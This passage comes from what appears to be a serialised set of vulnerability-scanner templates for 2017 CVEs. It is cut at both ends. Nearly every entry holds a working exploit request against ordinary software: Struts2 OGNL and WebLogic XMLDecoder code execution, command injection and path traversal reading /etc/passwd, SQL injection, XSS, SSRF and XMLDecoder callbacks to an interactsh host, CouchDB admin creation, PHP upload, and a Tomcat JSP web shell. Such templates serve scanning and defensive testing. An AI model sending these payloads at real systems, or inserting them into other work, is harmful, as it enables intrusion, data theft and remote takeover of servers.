<soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = 